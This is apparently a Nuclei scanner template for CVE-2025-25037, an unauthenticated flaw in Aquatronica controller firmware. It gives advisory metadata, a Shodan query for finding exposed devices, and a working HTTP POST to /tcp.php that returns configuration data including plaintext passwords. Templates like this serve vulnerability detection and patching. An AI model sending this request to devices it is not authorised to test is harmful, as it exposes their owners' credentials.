Aquatronica Controller System firmware 5.1.6 and earlier and web interface 2.0 and earlier contain an information disclosure vulnerability caused by unauthenticated access to tcp.php endpoint, letting remote attackers retrieve sensitive configuration data including plaintext credentials, exploit requires no authentication.
PoC代码[已公开]
id: CVE-2025-25037
info:
name: Aquatronica Controller System <= 5.1.6 - Information Disclosure
author: s4e-io
severity: high
description: |
Aquatronica Controller System firmware 5.1.6 and earlier and web interface 2.0 and earlier contain an information disclosure vulnerability caused by unauthenticated access to tcp.php endpoint, letting remote attackers retrieve sensitive configuration data including plaintext credentials, exploit requires no authentication.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
- https://www.exploit-db.com/exploits/52028
- https://vulncheck.com/advisories/aquatronica-controller-system-credential-leak
- https://nvd.nist.gov/vuln/detail/CVE-2025-25037
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H
cve-id: CVE-2025-25037
cwe-id: CWE-200
epss-score: 0.01173
epss-percentile: 0.78047
metadata:
verified: true
max-request: 1
vendor: aquatronica
product: controller
shodan-query: html:"aquatronica"
tags: cve,cve2025,aquatronica,info-leak,vkev,vuln
http:
- raw:
- |
POST /tcp.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG
matchers-condition: and
matchers:
- type: word
words:
- "WEB_PASSWORD"
- "pwd=""
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100d8617903f42ca3d87d929ee96f4c58cba5c24643078c37cbfa6eeb91fb6029cb022100f504c7922ef2994584dddcfe78b2c72fa5846dc1b6b98468d8914e6221c81c1e:922c64590222798bb761d5b6d8e72950